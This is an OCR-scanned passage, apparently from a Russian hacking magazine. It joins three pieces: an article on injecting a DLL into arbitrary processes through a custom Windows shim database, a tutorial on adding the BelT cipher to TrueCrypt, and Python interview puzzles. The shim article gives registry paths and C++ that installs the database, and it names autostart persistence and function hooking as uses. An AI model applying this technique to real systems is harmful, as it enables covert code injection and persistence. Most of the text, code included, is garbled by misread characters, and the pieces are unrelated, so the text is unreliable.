5сІѲ749ЬѲ -> \Ке^ізігѵ\МасІііпе\Бо-Ріыаге\Місго50-Рі\ЫіпсІоы5 
ІМТ\СиггепіѴег5Іоп\А р рСотраіР1а§5\Іп5іа11есІ5РВ 

По хгеГу добираемся до функции БсІЬРезоІѵеОаІаЬазе, кото- 
рая открывает данный ключ и смотрит значения ОаІаЬазеРаіЬ 
и ОаІаЬазеТуре. Далее определяем, что данный ключ предназна- 
чен (о чудо!) для пользовательских баз шимов, которые должны 
быть представлены в виде ОІІЮ'ов (как в реестре, так и в самой 
базе). 

Таким образом, ключ вида {61ІЮ} и два значения (ОаІаЬазеРаіЬ 
и ОаІаЬазеТуре) — это все что нам нужно для прописывания базы 
для конкретного приложения. 

СОЗДАНИЕ СОБСТВЕННОЙ БАЗЫ ШИМОВ 

Куда прописать базу, мы определили, но вопрос о том, как форми- 
ровать саму базу шимов, остался открытым. А ведь это реальная 
проблема, формат базы неизвестен, его придется восстанавли- 
вать вручную, а это очень большая работа. 

Может быть, есть какой-то обходной путь? Он действительно 
есть, и заключается в использовании уже готовой базы! Все 
что нам нужно - найти приложение, которое использует свою 
базу, и подменить в ней некоторые данные на наши. Приложе- 
ние, которое нашел я, называется ЕМЕТ ( доо.дІ/9Рп5Р . Качаем, 
запускаем Ргосезз Мопііог от Руссиновича, чтобы фиксировать 
все действия программы, устанавливаем ЕМЕТ, запускаем С:\ 
Ргодгат ЕіІез\ЕМЕТ\ЕМЕТ_6Ш.ехе, выбираем Сопіідиге Аррз, 
добавляем наш Іезі.ехе, закрываем ЕМЕТ. В логах монитора 
видим, что база шимов ЕМЕТ'а установилась в С:\ІлІІІ\Ю0ІлІ5\ 
АррРаісЬ\Сизіот\{Т8с4сс07-6сІс4-418Т-Ь72Ь-304ТссІЬб4052}. 
зсІЬ, а сІІІ скопировалась в С:\МІМР0ІлІ5\АррРаісЬ\ЕМЕТ.сІ11. 

Также из логов монитора получаем информацию об изме- 
нениях в реестре. Был создан ключ 50РТІлІА8Е\\МісгозоТі\\ 
Ілііпсіоіл/з МТ\\СиггепіѴег5Іоп\\АррСотраіР1а§5\\Си5іот\\іезі. 
ехе с нашим тестовым ехе, а также ключ, найденный нами 
ранее — Б0РТМАКЕ\\МісгозоТі\\ілііпсіоѵ\/5 І\ІТ\\СиггепіѴегзіоп\\ 
АррСотраіР1а§з\\Іпзіа11есІ5ОВ\\{Т8с4сс07-6сІс4-418Т-Ь72Ь- 
304ТссІЬб4052}. 

Как видишь, для принудительного указания шима исполь- 
зовалось не стандартное место Ьауегз, а Сизіот. Учтем. Теперь 
открываем базулюбым Ьех-редактором, находим етеі.сІІІ и ис- 
правляем на ІезІ.сІІІ. Далее берем ІезІ.сІІІ и закидываем в пап- 
ку С:\ѴѴІІ\Ю0ѴѴ5\АррРа1сЬ\. Запускаем наш Іезі.ехе и пробуем 
убедиться, что ІезІ.сІІІ проинжектировалась в Іезі.ехе. Для этого 
можно воспользоваться утилитой ѵттар ( аоо.аІ/БзБОп ) оттого 
же Руссиновича. Открываем Іезі.ехе с помощью ѵттар и ви- 
дим в его адресном пространстве нашу сІІІ, а значит — тіззіоп 
сотріеіе! 
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5Ыт: новый метод инжекта 



АВТОМАТИЗИРУЕМ ПРОЦЕСС 

Теперь напишем программу, которая будет все автоматически де- 
лать за нас, то есть записывать в реестр базу шимов и копировать 
саму базу и сІІІ к ней в системную папку (все проверки поскипаны, 
полный вариант см. на диске): 

#іпс!исІе сшіпсіоыб . б> 

#іпс!исІе <І05 Іігеат> 



#с1ебпе СШР I. " {~Р8с4с сѲ7-6сІс4 -418-Р -Ь72Ь-ЗѲ4-РссІЬ64Ѳ52}" 
#с!ебпе 5НІМ_КЕСКЕУ і"50РТ1ліАКЕ\\Місго5О-Рі:\\1лііпсіоы 5 ІМТ\У 
Сиггеп1іѴег5Іоп\\АррСотра1іР1а§5 " 



ВООІ_ Ке ^із ІіегБІіітРІІО 

І_ 

НКЕУ кеу; 

ВООк -РипсКезиІІ: = РАІ_5Е; 

ысбаг 1і сІЬРаІіЬ [ ] = І."С: \\ЫіпсІоы5\\АррРа1=сІі\\Си5І:от\\" 
СУЮ І_" . бсіЬ"; 

РІлІОКР сІЫуре = 0x10000; 

РЫСЖР64 зсІЬ = 0х1сс8828Ь2208е82 ; 



// создаем подраздел Сизііот в АррСотра1іР1а§5 

Ке §Сге а1=еКе ѵЕх(НКЕУ І.ОСАІ. МАСНІІМЕ, 

5НІМ_КЕСКЕУ І."\\Си5Ііот" . 0, І\іиі_І_ д 

КЕС_ОРТІОІ\І_І\ІОІ\І_ѴОІ_АТІ І_ Е , КЕУ_ІлІКІТЕ^І\іиі_І_ , 
&кеу, 1\іиі_1_); 

Ке§СІ05еКеу(кеу); 



// создаем ключ 

Ке§СгеаѣеКеуЕх(НКЕУ_тСАІ^АСНІІ\ІЕ, 
5НІМ_КЕ0КЕУ І."\\Си5Ііот\\1іе5Іі .ехе" . 

0. ІМШІ.. КЕ6 ОРТІОМ N014 ѴОІ.АТІІ.Е. 

КЕУ ІлІРІІТЕ іті-, &кеу, ІЧЦЩ; 

Ке§5е1=Ѵа1иеЕх(кеу . СШР і_".бсіЬ". 0. 

ВЕС СМЖР . (РВУТЕ)&бс 1Ь, 5І2ео-р (Р1лІ0КР64) ) : 
Ке§С1озеКеу ( кеу) ; 



Ке§СгеакеКеуЕх(НКЕУ_10СА1__МАСН11\1Е, 

БНІМ_КЕОКЕУ І_"\\ІПБІіа11есІ5ВВ , у 

0. ІМШІ.. ОРТІОИ ШІМ ѴОІ.АТІІ.Е . КЕУ ІлІКІТЕ. імци_. 

&кеу . МШП; 

Ке§СІ05еКеу(кеу) ; 



Ке§СгеакеКеуЕх(НКЕУ_І_ОСАІ__МАСНІІМЕ л 

5НІМ КЕСКЕУ I' 1 \\ІПБІ:а11есІ5РВ\\ " СШР. 
0. ІМЦІ_І_. ВЕС ОРТІОМ ШІМ ѴОІ.АТІІ.Е . 



ФУНКЦИИ 5НІМЕМ6.РІ_І_ 



У зИітепд.сМІ есть восемь экспортируемых функций: 

5Е_РІІІ_оасІесі — вызывается лоадером при загрузке сІІІ; 
ЗЕ_РІШпІоасіесі — вызывается лоадером при выгрузке сІІІ; 
5Е_0упатіс5Ыт — неизвестно кем вызывается; 
БЕ_6еІРгосАсІсІге55 — вызывается лоадером при СеІРгосАсІсігеББ; 
5Е_Іп5ІаІІАКегІпіІ — вызывается лоадером после инициализации 
движка шимов; 

5Е_ІПБіаІІВе^огеІпН — вызывается лоадером сразу после того, как 
он получитуказатели на данные функции; 

5Е_іб5Ыгп0іі — вызывается кодом из этой же сІІІ; 

БЕ_Ргосе550уіпд — вызывается при уничтожении процесса, то есть 
чуть раньше того момента, когда все точки входа сііГок процесса 
вызываются с причиной 0І_І__РРОСЕ55_0ЕТАСН. 




РІІ успешно внедрена 



КЕУЫКІТЕ. ІМЦЫ-. &кеу . ІМЦІ.П ; 



Ке^5е1=Ѵа1иеЕх(кеу . І_"Ра1іаЬа5еРа1іІі" . 0. 

КЕС 52 . ( ВУТЕ* ) сІЬРаІіІп . БІгеоЯсІЬРаШ ) ; 
Ке§5е1іѴа1иеЕх(кеу., Е'^а^абаБеТуре" , 0, КЕС_РІлІОКР л 

(РВУТЕ)&сІЫуре, 5І2ео-Р( РІлІСЖР)); 

Ке§С1озеКеу(кеу); 



гекигп ТРШЕ; 



ВООІ. СоруБбітРіІезО 

Сгеа1:еРігес1:огу(1 ,, С:Л\ІлІіпсІоы5\\АррРа1:сб\\Си5І:от ,, л МУН); 



СоруРі1е( СЫІР б" .зсІЬ" . 

1"С:\\1лІіпсІоы5\\АррРа1=сб\\Си5І=от\\" СШР і_".бсіЬ". 
ТКЦЕ V. 

СоруРі1е( б "1:е5І: . сііі^ 

1"С:\\ІлІіпсІоы5\\АррРа1=сб\\1=е5І=.сІ11" . ТКЦЕ V. 



геііигп ТРШЕ; 



іпі: таіп( ) 

{ 



СоруБЫтРПезО ; 
Ке § ІБІ= ег5бітР1 1 0 : 



біісі : : соиі: << "Ббіт іпдесіі сотріеііе. . . " << біісі : : епсіі ; 
біісі : : соиі: <^"Кип ІіеБІі.ехе апсі изе ѵттар.ехе 1:о зее 
Ііезі: . сІІІ іп АР 1651:. ехе" « біісі: : епсіі; 



геііигп 0; 

} 

ЗАКЛЮЧЕНИЕ 

Описать в одной статье все преимущества столь мощной тех- 
нологии как бЫгп епдіпе не получится, но даже из этой статьи 
можно почерпнуть многое. 

Во-первых, шимы дают возможность инжектироваться в лю- 
бое приложение средствами самой системы. 

Во-вторых, прописав шим, например, для ехріогег.ехе, 
этот факт может быть использован и как метод автозагрузки. 

А в-третьих, шимы дают возможность еще и перехватывать 
функции атакуемого приложения, однако это требует детального 
изучения формата базы. НЕ 
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ДОБАВЛЯЕМ ПОДДЕРЖКУ 
СВОИХ АЛГОРИТМОВ 
В ТКУЕСКѴРТ 



Наверняка все, кто когда-либо сталкивался 
с задачей создания шифрованного контейнера, 
знают о существовании программы ТгиеСгурІ. 
Простота использования, высокая скорость 
работы, открытые исходники и широкие 
функциональные возможности сделали этот 
шифровальщик одним из самых популярных 
в мире. Сегодня речь пойдет о том, как 
переделать его под себя. 




ЕГ-Яс 







Л 






"3 






Главное окно программы ТгиеСгурІ 



а сегодняшний день ТгиеСгурІ является одной из самых 
популярных программ для создания шифрованных файлов- 
контейнеров, шифрованных носителей информации, а также 
для шифрования операционных систем. При использовании средств 
подобного рода иногда возникает потребность удостовериться в от- 
сутствии в коде программы и алгоритмов шифрования различных 
закладок, которые могут скрытно сохранять информацию о ключах. 
Убедившись в обратном, возникает желание сделать собственными 
руками «доверенный» билд программы, в котором точно будет все ок. 
Также недоверие к зарубежным шифрам и здоровый патриотизм по- 
рой наталкивают на мысль добавить в данную программу отечествен- 
ные криптографические алгоритмы, которые во многом не уступают 
зарубежным аналогам. Реализовать и то, и другое позволяет наличие 
открытых исходных текстов ТгиеСгурІ. 

ПОДГОТОВКА К РАБОТЕ 

Прежде чем приступать к реализации нового алгоритма шифро- 
вания, подготовим все, что нужно для сборки. В первую очередь 
нам понадобятся исходники программы, которые можно скачать 
с официального сайта разработчика Ігиесгурі.огд (я использовал 
исходники версии 7.0а). В качестве среды разработки будем ис- 
пользовать МБ ѴізиаІ Біисііо 2010 (несмотря на то, что разработчики 
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используют МБ Ѵ5 2008 5Р1). Также нам понадобится 16-битный 
компилятор от МісгозоЙ, который идет в комплекте с МБ ѴізиаІ С++ 
1.52. Эту версию студии можно скачать по подписке МБйІМ, либо 
с рутрекера :). К слову сказать, 16-битный компилятор нужен для 
компиляции кода образов загрузочной дискеты, которая может 
оказаться незаменимым помощником при восстановлении данных 
из-за повреждения кода загрузчика на жестком диске. Также 
следует отметить, что устанавливать ѴізиаІ С++ 1.52 тебе не нужно 
— необходимо только распаковать архив. 

Кроме перечисленного потребуются ІЧА5М, дгір, ѴѴіпООК, а так- 
же хедеры РК5С#11 (доступны на сайте Р5А Оаіа Бесигііу]. 

Если все скачано и установлено, приступаем к настройке этого 
добра. В первую очередь нам необходимо добавить несколько 
переменных среды: 

1 . М5ѴС1 6 Р00Т созначением, равным пути кпапке М5ѴС15, которая 
будет создана после извлечения архива с МісгозоЙ ѴізиаІ С++ 1 .52; 

2. ѴѴІІ\ЮОК_РООТ созначением, равным пути, по которому мы уста- 
новили ѴѴіпООК; 

3. РКС51 1 I N С созначением, равным пути к папке с РКС5#11- 
хедерами. 

Дальше подкорректируем значение переменной РАТН, к кото- 
рой добавим пути к ехе'шникам от ІМА5М и дгір. После правок пере- 
менных среды может потребоваться перезагрузка компьютера. Для 
проверки корректности правок РАТН попробуй открыть командную 
строку, перейти в корень диска С:\ и запустить дгір.ехе. Если за- 
пуск прошел успешно, то все ок. Раз все установлено и настроено, 
попробуем сделать билд ТгиеСгурІ: распаковываем исходники, 
открываем солюшн в ѴізиаІ Біисііо (попутно его конвертируем], вы- 
бираем конфигурацию АП и жмем ВиіІсІ. Если все хорошо, то в папке 
Реіеазе окажется свежескомпилированный ТгиеСгурЕ Теперь 
давай добавим в него поддержку нового алгоритма шифрования. 

КОДИНГАЛГОРИТМА 

В качестве алгоритма шифрования для встраивания я выбрал сим- 
метричный алгоритм ВеІТ, который недавно был принят в качестве 



стандарта в Белоруссии. Этот алгоритм работает с блоками данных 
длиной 128 бит и с ключами длиной 128, 192 или 256 бит. Для ко- 
динга я выбрал вариант шифра с 256-битным ключом. 

Программная реализация любого симметричного шифра 
в ТгиеСгурІ должна содержать в себе следующие три функции: 
функцию инициализации шифра, которая осуществляет выработку 
массива раундовых подключей из ключа шифрования, функцию 
шифрования и функцию расшифровки блока сообщения. 

Для алгоритма ВеІТ функция инициализации будет иметь сле- 
дующий вид: 

Ье11:_іпі1:(ип5І§песІ * к, кІ_еп, 

* кз) 

{ 

( і = 0; і<32; ++і) кз[і] = к[і]; 

} 

Первый параметр функции — массив, содержащий ключ 
шифрования данных, второй параметр — длина данного ключа, 
а третий — массив раундовых подключей (его длина задается 
в коде ТгиеСгурІ константой МАХ_КЕѴ_І_ЕІ\І6ТН — максимальная 
длина кеу зсбесіиіе алгоритмов шифрования, поддерживающихся 
ТгиеСгурі). 

В данной реализации функции ЬеІІ_іпіІ есть две особенности. 
Во-первых, мы знаем точно, что на вход будет подаваться массив 
длиной в 32 байта, поэтому проверку значения кІ_еп можно опу- 
стить (хотя можно поставить аззегі). Второй момент — здесь мы 
просто один раз копируем ключ в массив раундовых ключей вместо 
многократного копирования ключа. Принимая во внимание СоИ 
Вооі Аиаск, при создании программных реализаций алгоритмов 
я стремлюсь минимизировать количество ключевой информации 
в оперативной памяти компьютера, и данная реализация шифра 
создается с учетом этого. 

Переходим к функции шифрования блока данных (кодинг 
функции расшифровки смотри на диске). Итак, сначала зададим 
несколько глобальных переменных: 

//блок подстановки (5Вох) 

Н[256] = 

//массив с индексами подключей 

КеуІпсІех[8] [7] = {...}; 

Массив Н является блоком подстановки, который задается табли- 
цей (смотри стандарт СТБ 34.101.31-2011), второй массив представля- 
ет собой индексы используемых раундовых подключей. Для ускоре- 
ния работы кода некоторые операции оформим в виде макросов: 

Ш1(х,Н) ((( ) (Н) [ 1Л((х)) ]) < < 24) 

е Ш2(х.Н) (((ип 32) (Н)[ Ц2 ((х)) ]) << 16) 

ШЗ(х,Н) ((( ) (Н)[ ІІЗ((х)) ]) << 8) 



РЕЖИМ ХТ5 



ХТ5 — основной режим работы блочных шифров в программе 
ТгиеСгурІ. По сути, данный режим является слегка измененным 
режимом ХЕХ, который был разработан Филиппом Рогауэем в 2003 
году. Отличия между режимами заключаются в том, что ХЕХ для 
двух различных целей использует один и тотже ключ, в то время 
какХТБ использует два независимых ключа. В 2010 году режим ХТ5 
был одобрен N151 для обеспечения конфиденциальности данных 
в устройствах хранения информации. Также в 2007 этот режим 
был одобрен ІЕЕЕ (ІЕЕЕ 1619). Схему работы режима ХТ5 смотри 
на рисунке. 
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НІІ4(х,Н) ((( ) (Н)[ ІІ4( (х) ) ])) 

е(х,н,г) ко* *ні(нім((х),(н)) | низ((х),(н)) \ 

| НІІ2( (х) л (Н) ) I НІІ1((х), (Н)), (г)) 

Макросы НІІ применяют блок подстановки к определенному 
байту в ОѴѴОРй, а макрос С задает одноименное преобразование из 
описания шифра. После определения нужных макросов остает- 
ся только запрограммировать схему работы алгоритма (смотри 
рисунок]. 

Прототип функции шифрования одного блока имеет вид: 
Ье11:_епсгур1: 

( 

*кз, 

* іпВІоск, 

* ои1:В1оск 



$ѵ4*а: [іЯ ' "3 Смтг««і: [смічм ксоть Ч 



АлГйргПЪ 


■ і ь ■ — ■ 


-*йіі<зрсі.. 


Ср#ЛчМ- 






ШШ*с 


к 


1 АТзЛіІіі 




**.&•<* 




Гн кии 


7МИЙЙ 






г5а»і4?« 


Шть 


ШЧіЛ 




из-тм№і 


ге.ЧМб ■: 


М.ЗШІ ІЬ 


*+. 7 Мб .г 


Г В1Д.ЫИ ДИ 

жиП.^яи 


я&ред 




ЫлНЯ.’е 




41.1** 




■е.ьыйк 


АЕ$-Ти№5ѵиг4 




М.Іи&А 


ЗОНА; 


ЬтгигІ-ТмЛіІтАН 


ло.ннбд. 




ыл»6к 




ІЛИЛАІ Ь- 
■ГМНТ 
игрѵКііцПіч 
ыркійрттмі 







Результаты бенчмарка ТгиеСгурІ 



Реализация данной функции приведена на рисунке. В целом 
программная реализация шифрования одного блока не вызы- 
вает проблем — блок делится на четыре значения типа йѴѴОРО, 
над которыми в течение восьми раундов проводятся операции 
наложения подстановки, сдвига, сложения и так далее. И соз- 
дание программной реализации алгоритма ВеІТ не сложнее 
программирования известного алгоритма Г0СТ28147-89. На 
данном этапе все готово к встраиванию алгоритма в программу 
ТгиеСгурП 

МОДИФИКАЦИЯ ТРІІЕСРѴРТ 

Итак, первым делом открываем в М5Ѵ5 2010 солюшн с ТгиеСгурІ 
и находим проект Сгуріо, который содержит исходные тексты всех 
алгоритмов шифрования, используемых в программе. В этот проект 
мы добавляем файлы с реализованным нами алгоритмом ВеІТ. Да- 
лее в любом проекте (например, Моипі) открываем заголовочный 
файл СгурІо.Ь и находим перечисление вида: 



оставить возможность использования нашего алгоритма для 
шифрования системы в целом. Также объявим константу, опреде- 
ляющую размер кеу зсЬесМе нашего алгоритма (как помнишь, я 
специально сделал так, чтобы он совпадал с основным ключом, то 
есть был равен 32 байтам): 

ВЕІ_Т_К5 32 

Далее в файле находим строку вида #\ідеі ТС_Ѵ\/ІІ\Ю0\Л/5_В00Т_ 
511\131_Е_МСЮЕ. В данном макросе указывается максимальный 
размер кеу зЬесІиІе при компиляции загрузчика, поддерживающего 
всего один алгоритм шифрования. В конце макроса добавляем 
пару строк: 

сі еб п есД ТС_МІ МООМ5_ВООТ_В Е І_Т ) 

МАХ_ЕХРАІ\ЮЕО_КЕѴ ВЕІ_Т_К5 

#епс!і-р 



іт { 

ІЧОІЧЕ = 0, 
АЕ5, 



Это перечисление содержит идентификаторы используемых 
криптографических алгоритмов. Добавим в него идентификатор 
ВЕЕТ, однако сделаем это до строки «#\іг\деі ТС_\Л/ІІ\І...», чтобы 



После делаем іпсЫе заголовочного файла нашей программ- 
ной реализации шифра ВеІТ (#іпсЫе "ВеІЕЬ"). С файлом СгурІо.Ь 
закончено. 

Переходим к файлу Сгуріо.с, в котором в первую очередь на- 
ходим объявление массива СірЬегзП со структурами типа СірЬег. 
В данный массив добавляем структуру с характеристиками наше 
го алгоритма — до строки «#Мпдеі ТС_ѴѴІ N ...» делаем вставку: 

{ ВЕЕТ,^Ве1Т (СТБ 34.101.31)", 16, 32, ВЕЕТ_К5 }, 



АЛГОРИТМ СТБ 34.101.31-2011 



Блочный алгоритм шифрования ВеІТ, описанный в стандарте СТБ 
34.101.31-2011, появился на свет относительно недавно, и в настоящий 
момент принят в качестве стандарта в Белоруссии. ВеМ: работает 
с блоками длиной 128 бит и использует ключи длиной 128, 192 или 256 
бит. 

Конструктивно алгоритм слегка напоминает ГОСТ 28147-89 — 
в обоих случаях раундовые ключи «вводятся» путем суммирования 
по модулю 2 Л 32, после чего применяется блок подстановки (таблицы 
замены в ГОСТ) и осуществляется сдвиг результата на некоторое число 
позиций в сторону старших разрядов. Однако есть и существенные 
различия: ГОСТ построен на основе сети Фейстеля, а в конструкции ВеИ: 
применяется 5Р-сеть. 

Как видишь, в алгоритме для преобразования информации 
применяются простые и легко реализуемые операции: сложение по 
модулю 2 Л 32, ХОР, циклический сдвиг и замена. 



Алгоритм состоит из восьми раундов, общая схема каждого раунда 
представлена на рисунке. Блок данных в 128 бит разбивается на четыре 
32-битных значения, с которыми и ведется работа. На рисунке буквой 
К с индексом обозначаются раундовые подключи, которых целых 56 
штук. Вырабатываются раундовые ключи из основного 256-битного 
ключа (к[1 ],..., к[8] ) очень просто: 

К[1]=к[ 1 ] , ..., К [ 8 ]=к[ 8 ], К [ 9 ] =к [ 1 ] , ..., К [ 56 ] =к [ 8 ] 

то есть путем семикратного копирования. 

Отсчет раундов алгоритма ведется с 1, номер раунда хранится 
в переменной і. Операция О состоит из преобразования 32-разрядного 
значения при помощи блока подстановки Н и циклического сдвига 
полученного значения на определенное число разрядов влево. В целом 
схема алгоритма довольно проста для программной реализации. 
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Зашифрование в соответствии с алгоритмом ВеІТ 



Режим работы ХТ5 



Первым элементом структуры СірЬег является идентификатор 
алгоритма, далее идет текстовая строка с его названием, тре- 
тий элемент — размер блока алгоритма в байтах, далее раз- 
мер ключа и размер кеу збесііііе соответственно. Далее следует 
внести коррективы в массив ЕпсгурЛопАІдопЛітзП структур 
ЕпсгурІіопАІдогііЬт. Данный массив инициализируется по-разному 
в зависимости оттого, определен ли ТС_ѴѴІ ЫПОѴѴБ ВООТ, и нам 
необходимо внести правки в обе его части. В массив добавляем 
строку (вторая часть массива изменяется аналогично): 

{{ ВЕН, 0 Ь {ХТ5, 0, 0, 0}, 1} 

В данной структуре первым элементом является список исполь- 
зуемых алгоритмов (могут использоваться несколько алгоритмов 
подряд), затем задается режим работы шифра — в данном случае 
указываем ХТ5 (описание данного режима работы смотри на 
врезке), а последнее значение является индикатором того, устарел 
ли алгоритм или нет (устаревшие алгоритмы используются для 
обратной совместимости со старыми версиями ТгиеСгурі). Вторую 
часть массива структур правим аналогичным образом. 

Далее переходим к изменению функции СірЬегІпіІ, которая, 
как видно из названия, производит инициализацию алгоритма 
шифрования. В ходе работы этой функции осуществляется кеу 
зсбебиіе шифра, поэтому смело добавляем в нее код, отвечающий 
за инициализацию нашего алгоритма: 

ВЕН: 

Ье11:_іпі1:(кеу, кз); 

Ьгеак; 

Аналогичным образом модифицируем функции ЕпсірЬегВІоск 
(отвечает за шифрование одного блока открытого текста), 
ОесірЬегВІоск (отвечает за расшифровку блока). Кроме того, не- 
обходимо подправить некоторые макросы (смотри в исходниках 
на диске), чтобы можно было осуществлять шифрование системы 
алгоритмом ВеІЕ 

После внесенных изменений осталось, по сути, сделать три 
вещи — немного поменять настройки проектов, добавить поддерж- 
ку наших алгоритмов в механизм самотестирования ТгиеСгурІ, 
а также добавить в ресурсы файлы ЬооІІоасІег'а с поддержкой 
ВеІТ. С правкой настроек проектов и ресурсов я предлагаю тебе 
справиться самостоятельно или посмотреть, как это сделано 
в исходниках на диске (там нет ничего сложного). Что же касается 
механизма самотестирования, то тут проверка осуществляется 
двумя способами: при помощи тестовых векторов, определенных 



в стандарте СТБ 34.101.31 (проверка корректной работы алгоритма 
шифрования), а также путем шифрования блока данных в режиме 
ХТ5, подсчета СРС32 от полученного шифрованного текста и срав- 
нения значения контрольной суммы с эталоном. В этот раз опять 
отправляю тебя смотреть исходники на диске, так как в програм- 
мировании механизма самотестирования в действительности нет 
ничего интересного. 

ПАРА СЛОВ О ГОСТ28147-89 

В чистом виде данный алгоритм добавлять в ТгиеСгурІ нельзя, 
так как используемая в нем программная реализация режима 
ХТ5 предполагает, что алгоритм шифрования работает с блоками 
длиной 128 бит, в то время как длина блока алгоритма ГОСТ — 64 
бита. Как ты уже догадался, это приведет к тому, что половина 
данных окажется в открытом виде. Есть вариант использовать 
ГОСТ два раза, то есть блок в 128 бит разбивать на два 64-бит- 
ных блока и каждый из них отдельно шифровать при помощи 
ГОСТ, однако данный путь также неприемлем (предлагаю тебе 
самому подумать, почему). В исходники на диске добавлена 
поддержка ГОСТ в случае, когда шифруется половина блока, 
а половина — остается незашифрованной. Ясно, что данный 
функционал нельзя использовать для защиты конфиденциаль- 
ных данных! 



ИСХОДНИКИ 

Лицензия ТгиеСгурІ налагает некоторые ограничения на исполь- 
зование кода — при его модификации необходимо обязательно 
убрать все логотипы с названием ТгиеСгурІ, название модифи- 
цированной программы не должно содержать строку «Ігиесгурі», 
а также должны быть убраны все ссылки на сайт ІгиесгурСогд (за 
исключением окна «О программе»). В связи с этим, а также из 
уважения к разработчикам, в исходниках на диске все упоминания 
о ТгиеСгурІ изменены на РІаіпСгурІ, а все ссылки ведут на 
ІосаІЬозі/ . 

Также хочу отметить, что у пользователей ѴѴіп7/ѴІ5Іа версии х64 
возникнут проблемы с установкой неподписанных драйверов. Что- 
бы заставить драйверы работать корректно, необходимо подписать 
их тестовой ЭЦП, а также включить специальный тестовый режим. 
Подробная инфа о том, как это сделать, есть как на сайте МісгозоЙ, 
так и в свободном доступе в интернете. 

НАРРУ ЕИй 

Вот, собственно, и все. Теперь, немного напрягшись, ты можешь 
поставить себе на службу отличную шифровалку со своими соб- 
ственными криптографическими алгоритмами. И-И 
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Павел Александрович (іѵіпзісіе.ЫодзроІ.сот) 





ПОДБОРКА ИНТЕРЕСНЫХ 
ЗАДАНИЙ, КОТОРЫХ ДАЮТ 
НА СОБЕСЕДОВАНИЯХ 



Если тебе на собеседовании или 
интервью попалась интересная 
задача - смело присылай ее мне, 
разберем ее в следующих выпусках 
нашей маленькой рубрики. 
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Задачи на собеседованиях 



УСЛОВИЕ 

Напиши функцию, которая будет получать на вход два списка и 
возвращать словарь, в котором ключи — элементы первого списка, 
а значения — элементы второго списка или ІМопе, если соответ- 
ствующий элемент отсутствует. 

>>> а =_[_"а", "Ь'Ѵ'с" ] 

>>> Ь = [1, 2] 

>>> ргіпі с Іісіі-Рѵ Са . Ь) 

{"а": 1. "Ь": 2 , "с ": ІМопе} 

РЕШЕНИЕ 

Мое первоначальное решение выглядело так: 
сІе-Р сІісіі-Р ѵ(а, Ь) : 

# возвращаем пустой словарь, если элементов больше. 

# чем ключей 

і-р 1еп(Ь) > 1еп(а): 

геіигп {} 



# конструируем словарь с помощью встроенных 

# функций гір и сіісі 

сііс = с1ісі(2ір(а. Ь)) 

# дополняем словарь пустыми элементами, если таковые имеются 
і-р 1еп(Ь) < 1еп(а): 

■Рог і і п хгап§е(1еп(Ь) , 1еп(а)): 
сііс [ а [ і ] ] = Моп е 
геіигп сііс 

Стоит отметить, что в РуіЬоп версии менее 2.2 еще не существо- 
вало конструктора сПсІ, и списки превращались в словари только с 
помощью цикла Рог: 

кеуз = [ ' а ' „ ' Ь ' „ 'с'] 
ѵаіз = [1, 2, 3] 
сііс = { } 

-Рог (к, ѵ) іп 2 Ір(кеуБ, ѵаіз) сі іс [ к ] 

Тогда я забыл про одну родственную и более старую встроенную 
функцию тар, которая применяет заданную функцию к каждому 
элементу последовательности. Но если вместо функции ей пере- 
дать ІМопе, то она просто объединяет элементы подобно гір, при 
этом автоматически заполняя отсутствующие значения словаря 
ІМопе. В итоге решение задачки еще больше упростилось: 

сІе-Р сІісіі- Рѵ(а, Ь) : 

і-р 1еп(Ь) >^1еп(а): 
геіигп {} 

сііс = сІісі(тар(Мопе, а, Ь)) 
геіигп сііс 



УСЛОВИЕ 

Есть такая функция: 

сІе-Р шуаррепсКа = []. пит = 0} : 
а . аррепсі(пит) 
ргіпі а 

Что будет происходить при выполнении следующего кода и 
почему: 

>>> а =_Е1, 2, 3] 

>>> туаррепсі(а) 

>>> туаррепсІ() 

>>> туаррепсІ() 

>>> а = {1:2, 3:4} 

>>> туаррепсІ(*а) 



>>> туаррепсІ(**а) 

РЕШЕНИЕ 

При выполнении программы будет такой вывод: 

[1. 2. 3. 0] 

Щ_ 

[0, 0] 

В первом случае функция отрабатывает в самом обычном режи- 
ме и к списку [1, 2, 3] просто добавляется новый элемент. 

Во втором случае, так как параметров при вызове не задано, 
используется параметр по умолчанию и создается новый объект 
— пустой список «а», к которому добавляется новый элемент 0. В 
третьей строчке снова параметр не задан и используется список, 
созданный при втором вызове функции туаррепсШ, так как спи- 
сок — изменяемый объект. 

Далее при вызове туаррепсІ(*а] возникнет исключение: 
АигіЬиІеЕггог: ’іпІ о Ь } е с 1: баз по аигібиіе 'аррепсГ, потому что 
функции передается словарь со значениями, а вышеприведенный 
способ подразумевает передачу списка. В этом случае правильно 
было бы сделать так: 

а = [[1 , 2 ], 3] 

туаррепсІ(*а) 

# что эквивалентно такому вызову: 

#_ туар репс і ( [ 1 , 2] , 3) 

При вызове туаррепсІ(**а) тоже возникнет исключение, но не- 
сколько другое: ТуреЕггог: туаррепсН) кеуѵѵогсіз тизі Ье зігіпдз. В 
этом случае должен передаваться словарь именованных аргумен- 
тов, что, в общем-то, и делается, но с ошибкой: названия ключей 
словаря должны соответствовать названиям аргументов, то есть 
корректный вызов будет выглядеть так: 

а = { 1 а ' : [1. 2] . ' пит' : 3> 
туаррепсІ(**а) 

# что эквивалентно такому вызову: 

# тѵаррепсК [1. 2] . 3) 

УСЛОВИЕ 

Напиши класс, который хранит список своих экземпляров и позво- 
ляет итегрировать по ним. 

>>> а = Кеерег() 

>>> Ь = Кеерег() 

>>> -Рог і і п Кеерег. ІІБ І іпБіапсезО : 

. . . ргіпі і 

<Кеерег іпзіапсе аі 0х... 

РЕШЕНИЕ 

Для решения этой задачки нужно знать про такой шаблон 
проектирования как декоратор и уметь его применять в языке 
Руібоп. Вообще говоря, в питоне декоратор — это функция, которая 
применяется к другой функции для расширения или изменения ее 
поведения. Синтаксис декораторов является попросту синтаксиче- 
ским сахаром: 

сІе-Р -Р(...): 

# = 5іаіістеіИосІ(-Р) 



@5іаіістеібосІ 
сІе-Р ~Р( . . . ) : 



В этом примере как раз-таки и показано применение нужного 
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нам декоратора — зІаЬстеіЬосІ, который превращает обычный 
метод класса в статический, то есть теперь этот метод можно 
вызывать напрямую, без создания экземпляра класса. Воспользу- 
емся им при решении задачи (список экземпляров будем хранить в 
переменной іпзіапсез): 

сіазз Кеерег: 

іпзіапсез = [] 

сІе-Р іпіі (зеіі) : 

зеіі. іпзіапсез . аррепсКзеІ-Р) 

@5І:а1:істе1:ИосІ 

сІе-Р 1І5і_іпзіапсез( ) : 

геіигп Кеерег. іпзіапсез 



РЕШЕНИЕ 

Эта строчка, как ты уже догадался, из результата сканирования 
